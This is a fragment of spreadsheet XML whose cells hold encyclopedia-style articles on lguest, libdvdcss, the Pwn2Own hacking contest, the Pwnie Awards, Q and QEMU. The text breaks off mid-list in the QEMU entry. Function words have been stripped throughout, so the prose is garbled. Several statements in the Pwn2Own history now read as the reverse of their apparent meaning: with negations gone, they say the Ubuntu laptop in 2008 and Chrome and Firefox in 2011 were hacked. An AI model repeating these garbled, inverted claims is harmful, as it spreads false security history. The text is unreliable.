    <t>lguest linux kernel virtualization hypervisor introduced kernel version 2.6.23 (released october 2007) removed kernel version 4.14 (november 2017). hypervisor operating-system-level virtualization system capable running unmodified 32-bit linux kernels guest machines. installation easy running modprobe followed tools/lguest/lguest create guest.lguest still installed kernel 4.14 later out-of-tree patches. lguest maintained rusty russell. also comparison platform virtualization software kernel-based virtual machine references external links official website introduction lguest (lwn.net)</t>
  </si>
  <si>
    <t>Libdvdcss</t>
  </si>
  <si>
    <t>libdvdcss libdvdcss2 repositories) free open-source software library accessing unscrambling dvds encrypted content scramble system (css). libdvdcss part videolan project used media player player software packages, ogle, xine-based players, mplayer. comparison decss libdvdcss confused decss. whereas decss uses cracked player perform authentication, libdvdcss uses generated list possible player keys. none work (for instance, drive enforces region coding), libdvdcss brute-forces key, ignoring dvd's region code any). legal status libdvdcss controversial been—unlike decss—no known legal challenge june 2022. distribution many linux distributions contain libdvdcss (for example, debian, ubuntu, fedora opensuse) fears running afoul dmca-style laws, often provide tools user install themselves. example, used available ubuntu medibuntu, longer available.distributions come pre-installed libdvdcss include backtrack, crunchbang linux, linuxmce, linux mint, pclinuxos, puppy linux 4.2.1, slax, super pardus, xbmc live. also arch linux official package repositories. usage libdvdcss alone library cannot play dvds. player applications, media player, library decode dvds. libdvdcss optional many open-source players, without non-encrypted discs play.using handbrake vidcoder ripping requires install libdvdcss (with compilation homebrew macos) references external links official website</t>
  </si>
  <si>
    <t>Pwn2Own</t>
  </si>
  <si>
    <t>pwn2own computer hacking contest held annually cansecwest security conference. first held april 2007 vancouver, contest held twice year, recently april 2021. contestants challenged exploit widely used software mobile devices previously unknown vulnerabilities. winners contest receive device exploited cash prize. pwn2own contest serves demonstrate vulnerability devices software widespread also providing checkpoint progress made security since previous year. history origins first contest 2007 conceived developed dragos ruiu response frustration apple inc.'s lack response month apple bugs month kernel bugs, well apple's television commercials trivialized security built competing windows operating system. time, widespread belief that, despite public displays vulnerabilities apple products, significantly secure competitors. march roughly three weeks cansecwest year, ruiu announced pwn2own contest security researchers dailydave mailing list. contest include macbook pros would leave conference floor hooked wireless access point. conference attendee could connect wireless access point exploit devices would able leave conference laptop. there monetary reward. name "pwn2own" derived fact contestants must "pwn" hack device order "own" first conference vancouver, british columbia, ruiu asked terri forslof zero initiative (zdi) participate contest. program purchases zero-day attacks, reports affected vendor turns signatures network intrusion detection system, increasing effectiveness. vulnerabilities sold made public affected vendor issued patch forslof agreed offer purchase vulnerabilities used contest flat price $10,000. first contest subsequently exposed high-profile quicktime flaw, disclosed apple april patched early may. 2008 scope pwn2own contest expanded. targets included three laptops running default installation windows vista, ubuntu linux. mobile devices added 2009.for 2012 rules changed capture-the-flag style competition point system, chrome successfully exploited first time, regular competitor vupen. after withdrawing contest year disclosure rules, 2013 google returned sponsor rules changed require full disclosure exploits techniques used. year(2013) single researcher able hack chrome, firefox trifecta hack. google ceased sponsor pwn2own 2015. recent years 2015, every browser tested successfully hacked every prize won, totaling $557,500. other prizes laptops also given winning researchers. 2018, conference much smaller sponsored primarily microsoft, china banned security researchers participating contest.pwn2own continues sponsored trend micro's zero initiative, reporting vulnerabilities vendors going public hacks. "one largest hacking contests world" according techcrunch, 2019 contest continues held several times year. pwn2own tokyo held november november tokyo, japan, expected hand $750,000 cash prizes. hacks focus browsers, virtual machines, computers, phones. 2019, contest added cars first time, $900,000 offered hacks exploiting tesla software. 2019, contest added industrial control systems. award system winners contest receive device exploited cash prize. winners also receive "masters" jacket celebrating year win. list successful exploits this list notable hacks incomplete. yearly contests 2007 contest took place thursday, april saturday, april 2007 vancouver. first contest intended highlight insecurity apple's operating system since, time, widespread belief secure competitors. concerning rules, macbook laptops, 15", left conference floor cansecwest joined separate wireless network. only certain attacks allowed restrictions progressively loosened three days conference. allowed remote attacks only, browser attacks included, allowed local attacks, contestants could connect stick bluetooth. order macbook pro, contestants would required escalate privileges root gaining access initial exploit. laptops hacked first day. after $10,000 prize announced zdi, shane macaulay called former co-worker dino zovi york urged compete second day. night, zovi found exploited previously unknown vulnerability quicktime library loaded safari. following morning, zovi sent exploit code macaulay, placed website e-mailed contest organizers link when clicked, link gave macauley control laptop, winning contest proxy zovi, gave macaulay macbook pro. zovi separately sold vulnerability $10,000 prize. 2008 pwn2own 2008 took place thursday, march saturday, march 2008. after successful 2007 contest, scope contest expanded include wider array operating systems browsers. contest would demonstrate widespread insecurity software widespread consumers. dragos refined contest help wide panel industry experts contest administered zdi, would offer purchase vulnerabilities demonstration. vulnerabilities purchases, details vulnerabilities used pwn2own would provided affected vendors public details would withheld patch made available. contestants successfully demonstrated exploits contest could sell vulnerabilities prizes $20,000 first day, $10,000 second day, $5,000 third day. previous year's contest, certain attacks allowed day. targets included three laptops running default installation windows vista ultimate sp1, 10.5.2, ubuntu linux 7.10. remote attacks only; contestants join network target laptop perform attack without user interaction without authentication. browser instant messaging attacks included, well malicious website attacks links sent organizers clicked. third-party client applications included. contestants could target popular third-party software browsers, adobe flash, java, apple mail, ichat, skype, aol, microsoft silverlight.concerning outcome, laptop running exploited second contest exploit safari browser co-written charlie miller, jake honoroff mark daniel independent security evaluators. their exploit targeted open-source subcomponent safari browser. laptop running windows vista exploited third contest exploit adobe flash co-written shane macaulay, alexander sotirov, derek callaway. after contest, adobe disclosed co-discovered vulnerability internally working patch time pwn2own. laptop running ubuntu exploited. 2009 pwn2own 2009 took place three days cansecwest thursday, march saturday, march 2009. after considerably success targeting browsers category software 2007, third pwn2own focused popular browsers used consumer desktop operating systems. added another category mobile devices contestants challenged hack many remote attack vectors including email, messages, website browsing. contestants demonstrated successful exploits contest offered rewards underlying vulnerabilities zdi, $5,000 browser exploits $10,000 mobile exploits.concerning browser rules, browser targets internet explorer firefox, chrome installed sony vaio running windows beta safari firefox installed macbook running browsers fully patched default configurations first contest. previous years, attack surface contest expanded three days. contestants target functionality default browser without access plugins. adobe flash, java, microsoft .net framework, quicktime included. popular third party plugins included like adobe reader. multiple winners target allowed, first contestant exploit laptop would mobile device targets included blackberry, android, apple iphone (t-mobile g1), symbian (nokia n95) windows mobile (htc touch) phones default configurations. browser contest, attack surface available contestants expanded three days. order prove able successfully compromise device, contestants demonstrate could collect sensitive data mobile device incur type financial loss mobile device owner. device could receive sms, mms, e-mail messages could read. wifi default), bluetooth default), radio stack also in-scope. sms, mms, e-mail could opened read. wifi turned bluetooth could turned paired nearby headset (additional pairing disallowed). allowed level user interaction default applications. multiple winners device allowed, first contestant exploit mobile device would (along one-year phone contract). concerning outcome, based increased interest competing 2009, arranged random selection determine team went first target. first contestant selected charlie miller. exploited safari without browser plugins. interviews winning contest, miller stressed took minutes exploit safari took many days research develop exploit used. researcher identified nils selected miller. nils successfully exploit internet explorer windows beta. writing exploit, nils bypass anti-exploitation mitigations microsoft implemented internet explorer windows including data execution protection (dep) address space layout randomization (aslr). nils continued trying browsers. although miller already exploited safari nils exploited platform again, moved exploit firefox successfully. near first day, julien tinnes sami koivu (remote) successfully exploited firefox safari vulnerability java. time, java enabled default allowed reliable exploitation platform. however, reported vulnerabilities vendor already, tinnes' participation fell outside rules contest unable rewarded. next days contest attract additional contestants. chrome, well mobile devices, went unexploited pwn2own 2009. 2010 competition started march 2010 total cash prize pool us$100,000. march 15—nine days contest begin—apple released sixteen patches webkit safari. concerning software exploit, $40,000 $100,000 reserved browsers, target worth $10,000. included microsoft internet explorer windows mozilla firefox windows google chrome windows apple safari snow leopard. included microsoft internet explorer windows vista, mozilla firefox windows vista, google chrome windows vista, apple safari snow leopard. included microsoft internet explorer windows mozilla firefox windows google chrome windows apple safari snow leopard. $60,000 total $100,000 cash prize pool allotted mobile phone portion contest, target worth $15,000. these included apple iphone 3gs, blackberry bold 9700, nokia device running symbian, nexus running android. opera browser left contests target: team argued opera market share chrome safari included "due default presence various mobile platforms". however, opera's rendering engine, presto, present millions mobile platforms.among successful exploits charlie miller successfully hacked safari nils hacked firefox windows 64-bit using memory corruption vulnerability bypass aslr dep, mozilla patched security flaw firefox 3.6.3. ralf-philipp weinmann vincenzo iozzo hacked iphone bypassing digital code signatures used iphone verify code memory apple. peter vreugdenhil exploited internet explorer windows using vulnerabilities involved bypassing aslr evading dep. 2011 2011 contest took place march 11th cansecwest conference vancouver. browser targets 2011 contest included microsoft internet explorer, apple safari, mozilla firefox, google chrome. pwn2own contest fact attack surface allowed penetrating mobile phones, specifically cellphone basebands. mobile phone targets dell venue running windows phone iphone running ios, blackberry torch 9800 running blackberry 6.0, nexus running android 2.3. several teams registered desktop browser contest. apple safari, registered competitors included vupen, anon_07, team anon, charlie miller. mozilla firefox included thomas anonymous_1. microsoft internet explorer teams included stephen fewer, vupen, thomas, ahmed sleet. google chrome teams included moatz khader, team anon, ahmed sleet. mobile browser category, following teams registered. apple iphone hack attempt, teams included anon_07, dion blazakis charlie miller, team anon, anonymous_1, ahmed sleet. hack blackberry teams wereanonymous_1, team anon, ahmed sleet. hack samsung nexus teams included oberheide, anonymous_1, anon_07, team anonymous. hack dell venue pro, teams included george hotz, team anonymous, anonymous_1, ahmed sleet. during first competition, safari internet explorer defeated researchers. safari version 5.0.3 installed fully patched 10.6.6. french security firm vupen first attack browser. internet explorer 32-bit version installed 64-bit windows service pack security researcher stephen fewer harmony security successful exploiting this demonstrated just safari. iphone blackberry torch 9800 exploited. iphone running 4.2.1, however flaw exists version ios. security researchers charlie miller dion blazakis able gain access iphone's address book vulnerability mobile safari visiting exploit ridden webpage. blackberry torch 9800 phone running blackberry 6.0.0.246. team vincenzo iozzo, willem pinckaers, ralf philipp weinmann took advantage vulnerability blackberry's webkit based browser visiting previously prepared webpage. firefox, android, windows phone scheduled tested security researchers chosen platforms attempt exploits. thomas selected test firefox, withdrew stating exploit stable. researchers chosen test android windows phone show teams showed three. chrome firefox hacked. 2012 2012 rules changed capture-the-flag style competition point system. format caused charlie miller, successful event past years, decide attend, required "on-the-spot" writing exploits miller argued favored larger teams. hackers went four major browsers.at pwn2own 2012, chrome successfully exploited first time. vupen declined reveal escaped sandbox, saying would sell information. internet explorer windows successfully exploited next. firefox third browser hacked using zero exploit.safari lion browser left standing conclusion zero portion pwn2own. versions safari fully patched running snow leopard compromised portion pwn2own. significant improvements security mitigations within introduced lion. controversy google google withdrew sponsorship event 2012 rules require full disclosure exploits winners, specifically exploits break sandboxed environment demonstrated exploits "win". pwn2own defended decision, saying believed hackers would attempt exploit chrome methods disclosed. google offered separate "pwnium" contest offered $60,000 chrome-specific exploits. non-chrome vulnerabilities used guaranteed immediately reported appropriate vendor. sergey glazunov teenager identified "pinkiepie" earned $60,000 exploits bypassed security sandbox. google issued chrome users less hours pwnium exploits demonstrated. 2013 2013, google returned sponsor rules changed require full disclosure exploits techniques used. mobile pwn2own 2013 contest held november 13–14, 2013, pacsec 2013 conference tokyo. browsers google chrome, internet explorer firefox, along windows java, exploited. adobe also joined contest, adding reader flash. apple safari mountain lion targeted teams showed french security firm vupen successfully exploited fully updated internet explorer microsoft surface running 64-bit version windows fully bypassed protected mode sandbox without crashing freezing browser. vupen team exploited mozilla firefox, adobe flash, oracle java pinkie $50,000, google released chrome updates november address vulnerabilities exploited. nils mwrlabs successful exploiting google chrome using webkit windows kernel flaws bypass chrome sandbox $100,000. george hotz exploited adobe acrobat reader escaped sandbox $70,000. james forshaw, joshua drake, murphy independently exploited oracle java $20,000 each. mobile contest contestants winning $117,500 prize pool $300,000. 2014 pwn2own 2014 march held vancouver cansecwest conference sponsored hewlett-packard. four targeted browsers fell researchers, contestants overall $850,000 available pool $1,085,000. vupen successfully exploited fully updated internet explorer adobe reader google chrome, adobe flash, mozilla firefox 64-bit version windows 8.1, total $400,000—the highest payout single competitor date. company used total distinct zero-day vulnerabilities.among successful exploits 2014, internet explorer exploited sebastian apelt andreas schmidt prize $100,000. apple safari mavericks adobe flash windows successfully exploited liang chen keen team zeguang zhao team509. mozilla firefox exploited three times first day, second day, awarding researchers $50,000 disclosed firefox flaw year. both vupen anonymous participant exploited google chrome. vupen earned $100,000 crack, anonymous entrant prize $60,000 reduced, attack relied vulnerability revealed google's pwnium contest. also, nico joly vupen team took windows phone (the lumia 1520), unable gain full control system. 2014, keen hacked windows adobe flash seconds, well mavericks safari system seconds. 2015–2017 every single prize available claimed 2015 march vancouver, browsers hacked total $557,500 prizes. hacker proved jung hoon lee, took stable beta versions google chrome, apple safari" earned $225,000 prize money. other hacks included team509 keenteem breaking adobe flash, breaks adobe reader. overall, bugs windows operating system, internet explorer firefox, adobe reader, adobe flash, safari, chrome. google ceased sponsor pwn2own 2015.at contest march 2016, "each winning entries able avoid sandboxing mitigations leveraging vulnerabilities underlying oss." 2016, chrome, microsoft edge safari hacked. according brian gorenc, manager vulnerability research hpe, chosen include firefox year "wanted focus browsers [had] made serious security improvements last year". 2016, qihoo360 successfully hacked pixel seconds.in march 2017 vancouver, first time hackers broke vmware's virtual machine sandbox. 2017, chrome successful hacks (although team attempted target chrome), subsequent browsers best fared were, order, firefox, safari edge. mobile pwn2own held november 2017. representatives apple, google huawei contest. various smartphones, including ones using apple's 11.1 software, also successfully hacked. successful attacks" iphone huawei mate samsung galaxy google pixel hacked. overall, year awarded $833,000 uncover zero-day bugs. team qihoo prize 2017. 2018 2018, conference much smaller sponsored primarily microsoft. china banned security researchers participating contest, despite chinese nationals winning past, banned divulging security vulnerabilities foreigners. particular, tencent's keen labs qihoo 360's 360vulcan teem enter, chinese nationals. tianfu subsequently designed "chinese version pwn2own", also taking place twice year. also, shortly 2018 conference, microsoft patched several vulnerabilities edge, causing many teams withdraw. nevertheless, certain openings found edge, safari, firefox more. hack attempts made chrome, although reward offered edge. hackers ultimately awarded $267,000. while many microsoft products large rewards available anyone able gain access them, edge successfully exploited, also safari firefox. 2019 march 2019 contest took place vancouver cansecwest conference, categories including vmware esxi, vmware workstation, oracle virtualbox, chrome, microsoft edge, firefox, well tesla. tesla entered model sedan, pair researchers earning $375,000 hacked finding severe memory randomization car's infotainment system. also first year hacking devices home automation category allowed.in october 2019, politico reported next edition pwn2own added industrial control systems. pwn2own tokyo held november november expected hand $750,000 cash prizes. facebook portal entered, amazon echo show google nest max, amazon cloud nest indoor. also entered oculus quest virtual reality kit. 2019, team $60,000 hacking amazon echo show they hacking "patch gap" meshed older software patched onto platforms, smart screen used version chromium. team shared findings amazon, said investigating hack would take "appropriate steps." 2020 edition pwn2own contest took place january 21–23, 2020, miami conference, industrial control system scada targets only. contestants awarded $250,000 three event hackers demonstrated multiple exploits many leading platforms. steven seeley chris anastasio, hacker calling team incite, awarded title master winnings $80,000 92.5 master points. overall, contest winning demonstrations, nine partial wins collisions, failed entries.the spring edition pwn2own 2020 occurred march 18–19, 2020. tesla returned sponsor model available target. covid-19, conference moved virtual event. zero initiative decided allow remote participation. this allowed researchers send exploits program prior event. researchers exploits homes recorded screen well zoom call contestant. contest successful demonstrations awarded $270,000 two-day event purchasing unique bugs adobe reader, apple safari macos, microsoft windows, oracle virtualbox. amat cama richard (team fluoroacetate) crowned master earnings $90,000.the fall edition pwn2own, normally referred pwn2own tokyo, held november 5–7, 2020. with lockdown covid-19 continuing, contest held virtually titled pwn2own tokyo (live from toronto). researchers toronto event, others connecting home. this contest also inclusion storage area network (san) servers target. event eight winning entries, nine partial wins collisions, failed attempts. overall, contest awarded $136,500 unique bugs. flashback team (pedro ribeiro radek domanski) earned master title successful wide area network (wan) router exploits. 2021 april 6–8, 2021, pwn2own contest took place austin virtually. this year’s event expanded adding enterprise communications category, includes microsoft teams zoom messenger. first contest apple safari, microsoft exchange, microsoft teams, windows ubuntu compromised. zoom messenger compromised second contest zero-click exploit. parallels desktop, google chrome, microsoft edge also successfully exploited contest. over $1,200,000 awarded unique 0-days. master three team devcore, team daan keuper thijs alkemade. this year's contest also first ever female participant, alisa esage.[https://twitter.com/abdhariri/status/1380292717356462081 2022 second edition pwn2own miami occurred april 19-21, 2022, filmore south beach miami. over three-day contest, $400,000 awarded unique 0-days. team daan keuper thijs alkemade computest sector awarded master earnings $90,000. highlight contest demonstration daan thijs bypassing trusted application check foundation .net standard.pwn2own returned vancouver 18-20, 2022, celebrate 15th anniversary contest. over three-day event, awarded $1,155,000 unique 0-day vulnerabilities. contest single-day contest record $800,000 awarded various exploits, including three separate microsoft teams demonstrations. exploits required user interaction could used compromise entire organization. also demonstrated successful demonstrations mozilla firefox apple safari browsers. contest highlighted remote exploit tesla infotainment system. researchers synacktiv team able remotely start windshield wipers, open trunk, flash headlights vehicle. event's final three windows privilege escalations successfully demonstrated. exploits used unique bugs. once points totaled, star labs team awarded title master $270,000 points. also competitive programming white (computer security) zero initiative references external links cansecwest applied security conference</t>
  </si>
  <si>
    <t>Pwnie Awards</t>
  </si>
  <si>
    <t>pwnie awards recognize excellence incompetence field information security. winners selected committee security industry professionals nominations collected information security community. nominees announced yearly summercon, awards presented black security conference. origins name pwnie award based word "pwn", hacker slang meaning "compromise" "control" based previous usage word "own" (and pronounced similarly). name "the pwnie awards," pronounced "pony," meant sound like tony awards, awards ceremony broadway theater york city. history pwnie awards founded 2007 alexander sotirov dino zovi following discussions regarding dino's discovery cross-platform quicktime vulnerability (cve-2007-2175) alexander's discovery file processing vulnerability (cve-2007-0038) internet explorer. winners 2022 lamest vendor response: google's "tag" response team fixing several zero-day exploits (something normally regarded highly beneficial security), allegedly according jury "shut counterterrorism operation".. 2021 lamest vendor response: cellebrite, response moxie, creator signal, reverse-engineering ufed accompanying software reporting discovered exploit. epic achievement: ilfak guilfanov, honor ida's 30th anniversary. best privilege escalation bug: baron samedit qualys, discovery 10-year-old exploit sudo. best song: ransomware song forrest brazeal best server-side bug: orange tsai, microsoft exchange server proxylogon attack surface discoveries. best cryptographic attack: disclosure verification signatures windows breaks certificate trust chain. most innovative research: enes göktaş, kaveh razavi, georgios portokalidis, herbert bos, cristiano giuffrida vusec research "blindside" attack. most epic fail: microsoft, failure printnightmare. best client-side bug: gunnar alendal's discovery buffer overflow samsung galaxy s20's secure chip. most under-hyped research: qualys research team 21nails, vulnerabilities exim, internet's popular mail server. 2020 best server-side bug: bravestarr (ronald huizer, cve-2020-10188) fedora netkit telnetd remote exploit best privilege escalation bug: checkm8 (axi0mx) permanent unpatchable bootrom exploit billion devices. epic achievement: guang gong, "remotely rooting modern android devices" best cryptographic attack: zerologon vulnerability (tom tervoort, cve-2020-1472) best client-side bug: samsung phones (mateusz jurczyk, cve-2020-8899 -16747), zero click remote execution attack. most under-hyped research: vulnerabilities system management mode (smm) trusted execution technology (txt) (gabriel negreira barbosa, rodrigo rubira branco, cihula, cve-2019-0151, -0152) most innovative research: trrespass: when memory vendors tell their chips rowhammer-free, they not. (pietro frigo, emanuele vannacci, hasan hassan, victor veen, onur mutlu, cristiano giuffrida, herbert bos, kaveh razavi) most epic fail: microsoft (cve-2020-0601); implementation elliptic-curve signatures meant attackers could generate private pairs public keys signer, allowing https signed binary spoofing. best song: powertrace rebekka aigner, daniel gruss, manuel weber, moritz lipp, patrick radkohl, andreas kogler, maria eichlseder, eltonno, tunefish, yuki, kater lamest vendor response: daniel bernstein (cve-2005-1513) 2019 best server-side bug: orange tsai chang, research. most innovative research: vectorized emulation brandon falk best cryptographic attack: dr4g0nbl00d mathy vanhoef, eyal ronen lamest vendor response: bitfi most over-hyped bug: allegations supermicro hardware backdoors, bloomberg most under-hyped bug: thrangrycat, jatin kataria, balloon security 2018 most innovative research: spectre/meltdown paul kocher, jann horn, anders fogh, daniel genkin, daniel gruss, werner haas, mike hamburg, moritz lipp, stefan mangard, thomas prescher, michael schwarz, yuval yarom best privilege escalation bug: spectre/meltdown paul kocher, jann horn, anders fogh, daniel genkin, daniel gruss, werner haas, mike hamburg, moritz lipp, stefan mangard, thomas prescher, michael schwarz, yuval yarom lifetime achievement: michał zalewski best cryptographic attack: robot return bleichenbacher’s oracle threat hanno böck, juraj somorovsky, craig young lamest vendor response: bitfi late entry received thousands nominations multiple hackers cracked bitfi's device following john mcafee's praising device security. even though hackers cracked device, design device contain private keys therefore breaking device would result successful extraction funds. bitfi eager bounties followed rules stipulated. announcement made september 2018 details bounty conditions payments would made. 2017 epic achievement: finally getting tiocsti ioctl attack fixed federico bento most innovative research: aslr line gras, kaveh razavi, erik bosman, herbert bos, cristiano giuffrida best privilege escalation bug: drammer victor veen, yanick fratantonio, martina lindorfer, daniel gruss, clementine maurice, giovanni vigna, herbert bos, kaveh razavi, cristiano giuffrida best cryptographic attack: first collision full sha-1 marc stevens, elie bursztein, pierre karpman, ange albertini, yarik markov lamest vendor response: lennart poettering mishandling security vulnerabilities spectacularly multiple critical systemd bugs best song: hello (from other side) manuel weber, michael schwarz, daniel gruss, moritz lipp, rebekka aigner 2016 most innovative research: dedup machina: memory deduplication advanced exploitation vector erik bosman, kaveh razavi, herbert bos, cristiano giuffrida lifetime achievement: peiter zatko mudge best cryptographic attack: drown attack nimrod aviram best song: cyberlier katie moussouris 2015 pwnie most epic fail: u.s. office personnel management lifetime achievement: thomas dullien halvar flake most innovative research: imperfect forward secrecy: diffie-hellman fails practice adrian david 2014 best server-side bug: heartbleed (neel mehta codenomicon, cve-2014-0160) best client-side bug: google chrome arbitrary memory read write vulnerability, (geohot, cve-2014-1705) best privilege escalation bug: afd.sys dangling pointer vulnerability (sebastian apelt, cve-2014-1767); winner pwn2own 2014. most innovative research: extraction low-bandwidth acoustic cryptanalysis (daniel genkin, shamir, eran tromer); extract decryption keys laptops within hour using sounds generated computer. lamest vendor response: remote administration insecure design” (avg) best song: "the smiley song" (0xabad1dea) most epic fail: goto fail (apple inc.) epic 0wnage: gox, (mark karpelès) 2013 best server-side bug: ruby rails yaml (cve-2013-0156) murphy best client-side bug: adobe reader buffer overflow sandbox escape (cve-2013-0641) unknown best privilege escalation bug: incomplete codesign bypass kernel vulnerabilities (cve-2013-0977, cve-2013-0978, cve-2013-0981) david wang planetbeing evad3rs team most innovative research: identifying exploiting windows kernel race conditions memory access patterns mateusz "j00ru" jurczyk, gynvael coldwind best song: "all things" dual core most epic fail: nmap: internet considered harmful darpa inference checking kludge scanning hakin9 epic 0wnage: joint award edward snowden lifetime achievement: barnaby jack 2012 award best server-side went sergey golubchik mysql authentication bypass flaw. awards best client-side given sergey glazunov pinkie google chrome flaws presented part google's pwnium contest.the award best privilege escalation went mateusz jurczyk ("j00ru") vulnerability windows kernel affected 32-bit versions windows. award innovative research went travis goodspeed send network packets would inject additional packets.the award best song went "control" nerdcore rapper dual core. category award, "tweetie pwnie award" twitter followers judges, went musclenerd iphone team representative jailbreaking community.the "most epic fail" award presented metasploit creator moore networks static root issue, award accepted employee unusual winner category usually accept award ceremony. other nominees included linkedin (for data breach exposing password hashes) antivirus industry (for failing detect threats stuxnet, duqu, flame).the award "epic 0wnage" went flame collision attack, recognizing sophisticated serious piece malware weakened trust windows update system. 2011 best server-side bug: asp.net framework padding oracle (cve-2010-3332) juliano rizzo, thai duong best client-side bug: freetype vulnerability (cve-2011-0226) comex best privilege escalation bug: windows kernel win32k user-mode callback vulnerabilities (ms11-034) tarjei mandt most innovative research: securing kernel static binary rewriting program shepherding piotr bania lifetime achievement: pipacs/pax team lamest vendor response: securid token compromise best song: "[the light contest]" geohot most epic fail: sony pwnie epic 0wnage: stuxnet 2010 best server-side bug: apache struts2 framework remote code execution (cve-2010-1870) meder kydyraliev best client-side bug: java trusted method chaining (cve-2010-0840) sami koivu best privilege escalation bug: windows trap handler (cve-2010-0232) tavis ormandy most innovative research: flash pointer inference spraying dionysus blazakis lamest vendor response: lanrev remote code execution absolute software best song: "pwned 1337 edition" raid heavy pennies most epic fail: microsoft internet explorer filter 2009 best server-side bug: linux sctp chunk memory corruption (cve-2009-0065) david 'dk2' best privilege escalation bug: linux udev netlink message privilege escalation (cve-2009-1185) sebastian krahmer best client-side bug: msvidctl.dll mpeg2tunerequest stack buffer overflow (cve-2008-0015) ryan smith alex wheeler mass 0wnage: networks backdoored openssh packages (cve-2008-3844) anonymous best research: from 0day symbian credit: bernhard mueller lamest vendor response: linux "continually assuming kernel memory corruption bugs denial-of-service" linux project most overhyped bug: ms08-067 server service netpwpathcanonicalize() stack overflow (cve-2008-4250) anonymous best song: nice report doctor raid most epic fail: twitter gets hacked "cloud crisis" twitter lifetime achievement award: solar designer 2008 best server-side bug: windows igmp kernel vulnerability (cve-2007-0069) alex wheeler ryan smith best client-side bug: multiple protocol handling flaws nate mcfeters, carter, billy rios mass 0wnage: unbelievable number wordpress vulnerabilities most innovative research: lest remember: cold boot attacks encryption keys (honorable mention awarded rolf rolles work virtualization obfuscators) alex halderman, seth schoen, nadia heninger, william clarkson, william paul, joseph calandrino, ariel feldman, rick astley, jacob appelbaum, edward felten lamest vendor response: mcafee's "hacker safe" certification program most overhyped bug: kaminsky's cache poisoning vulnerability (cve-2008-1447) best song: packin' kaspersky labs most epic fail: debian's flawed openssl implementation (cve-2008-0166) lifetime achievement award: newsham 2007 best server-side bug: solaris in.telnetd remote root exploit (cve-2007-0882), kingcope best client-side bug: unhandled exception filter chaining vulnerability (cve-2006-3648) skape skywing mass 0wnage: setabortproc remote code execution (cve-2005-4560) anonymous most innovative research: temporal return addresses, skape lamest vendor response: openbsd ipv6 mbuf kernel buffer overflow (cve-2007-1365) most overhyped bug: macbook wi-fi vulnerabilities, david maynor best song: symantec revolution, symantec references external links pwnie awards</t>
  </si>
  <si>
    <t>Q (emulator)</t>
  </si>
  <si>
    <t>free emulator software runs including powerpc. mike kronenberg's port open source generic processor emulator qemu. uses cocoa apple technologies, core image core audio, achieve emulation. used windows, operating system based architecture, macintosh. available universal binary and, such, intel powerpc based macintosh systems. however, target guest architectures unsupported lion (due removal rosetta) sparc, mips, x86_64 since softmmus powerpc binaries. unlike qemu, command-line application, native graphical interface managing configuring virtual machines. june 2022, project hold". also qcow comparison platform virtualization software spim emulator qemu references external links [kju:] homepage project macupdate listing qemu forum boot camp, q/qemu, parallels: pros/cons infoworld (april 2006)</t>
  </si>
  <si>
    <t>QEMU</t>
  </si>
  <si>
    <t>qemu free open-source emulator. emulates machine's processor dynamic binary translation provides different hardware device models machine, enabling variety guest operating systems. interoperate kernel-based virtual machine (kvm) virtual machines near-native speed. qemu also emulation user-level processes, allowing applications compiled architecture another. licensing qemu written fabrice bellard free software, mainly licensed general public license (gpl short). various parts released license, lesser general public license (lgpl) gpl-compatible licenses. operating modes qemu multiple operating modes: user-mode emulation mode qemu runs single linux darwin/macos programs compiled different instruction set. system calls thunked endianness 32/64 mismatches. fast cross-compilation cross-debugging main targets user-mode emulation. system emulation mode qemu emulates full computer system, including peripherals. used provide virtual hosting several virtual computers single computer. qemu boot many guest operating systems, including linux, solaris, microsoft windows, dos, bsd; supports emulating several instruction sets, including x86, mips, 32-bit armv7, armv8, powerpc, sparc, etrax cris microblaze. hosting here qemu deals setting migration images. still involved emulation hardware, execution guest done requested qemu. hosting qemu involved emulation hardware; execution guest done within totally hidden qemu. features qemu save restore state virtual machine programs running. guest operating systems need patching order inside qemu. qemu supports emulation various architectures, including x86, mips64 release sparc (sun4m sun4u), (integrator/cp versatile/pb), superh, powerpc (prep power macintosh), etrax cris, microblaze, risc-v. virtual machine interface many types physical host hardware, including user's hard disks, cd-rom drives, network cards, audio interfaces, devices. devices completely emulated, host's devices used, although requires administrator privileges work devices. virtual disk images stored special format (qcow qcow2) takes much disk space guest actually uses. this way, emulated disk occupy hundred megabytes host. qcow2 format also allows creation overlay images record difference another (unmodified) base image file. this provides possibility reverting emulated disk's contents earlier state. example, base image could hold fresh install operating system known work, overlay images used. should guest system become unusable (through virus attack, accidental system destruction, etc.), user delete overlay earlier emulated disk image. qemu emulate network cards different models) share host system's connectivity network address translation, effectively allowing guest network host. virtual network cards also connect network cards instances qemu local interfaces. network connectivity also achieved bridging tun/tap interface used qemu non-virtual ethernet interface host using host os's bridging features. qemu integrates several services allow host guest systems communicate; example, integrated server network-port redirection allow incoming connections virtual machine). also boot linux kernels without bootloader. qemu depend presence graphical output methods host system. instead, allow access screen guest integrated server. also emulated serial line, without screen, applicable operating systems. simulating multiple cpus running possible. qemu require administrative rights unless additional kernel modules improving speed (like kqemu) used certain modes network connectivity model utilized. tiny code generator tiny code generator (tcg) aims remove shortcoming relying particular version compiler, instead incorporating compiler (code generator) tasks performed qemu time. whole translation task thus consists parts: basic blocks target code (tbs) rewritten kind machine-independent intermediate notation, subsequently notation compiled host's architecture tcg. optional optimisation passes performed them, just-in-time compiler (jit) mode. requires dedicated code written support every architecture runs knows translate dedicated code available architecture, falls back slow interpreter mode called interpreter (tci). also requires updating target code instead dyngen ops. starting qemu version 0.10.0, ships qemu stable release. replaces dyngen, relied work. accelerator kqemu linux kernel module, also written fabrice bellard, notably sped emulation x86-64 guests platforms architecture. this worked running user mode code (and optionally kernel code) directly host computer's cpu, using processor peripheral emulation kernel-mode real-mode code. kqemu could execute code many guest oses even host support hardware-assisted virtualization. kqemu initially closed-source product available free charge, starting version 1.3.0pre10 (february 2007), relicensed general public license. qemu versions starting 0.12.0 august 2009) support large memory makes incompatible kqemu. newer releases qemu completely removed support kqemu. qvm86 gplv2 licensed drop-in replacement closed-source kqemu. developers qvm86 ceased development january, 2007. kernel-based virtual machine (kvm) mostly taken linux-based hardware-assisted virtualization solution qemu wake lack support kqemu qvm86. qemu also architectures like mips.intel's hardware accelerated execution manager (haxm) open-source alternative x86-based hardware-assisted virtualization netbsd, linux, windows macos using intel 2013 intel mostly solicits qemu android development. starting version 2.9.0, official qemu includes support haxm, name hax.qemu also supports following accelerators: hvf, apple's hypervisor.framework based intel whpx, microsoft's windows hypervisor platform based intel amd-v. tcg, qemu's tiny code generator. this default. supported disk image formats qemu supports following disk image formats: macos universal disk image format (.dmg) read-only bochs read-only linux cloop read-only parallels disk image (.hdd, .hds) read-only qemu copy-on-write (.qcow2, 